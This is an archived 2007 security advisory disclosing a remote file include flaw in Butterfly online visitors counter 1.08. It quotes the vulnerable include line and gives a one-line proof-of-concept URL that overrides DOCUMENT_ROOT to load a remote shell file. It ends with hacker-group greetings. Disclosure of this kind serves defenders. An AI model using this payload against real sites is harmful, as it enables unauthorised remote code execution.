Butterfly online vistors counter 1.08 RFI

2007-08-21T00:00:00
ID SECURITYVULNS:DOC:17845
Type securityvulns
Reporter Securityvulns
Modified 2007-08-21T00:00:00

Description

App Name : Butterfly online vistors counter v.1.08 HomePage : http://www.phoenix.frihost.net/butterfly/read_me.php Vuln type : Remote File Include (RFI) Vulnerability Discovered by : iNs

Vuln Code: visitor.php

include_once $_SERVER["DOCUMENT_ROOT"] . "/butterfly/custom.php"; // include settings

POC: htttp://site.com/[path]/visitor.php?_SERVER[DOCUMENT_ROOT]=SHELL.txt??

Note: This is sploitable only on old version of PHP.

iNs @ uNkn0wn.eu

Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - C0ol - Mic22 - str0ke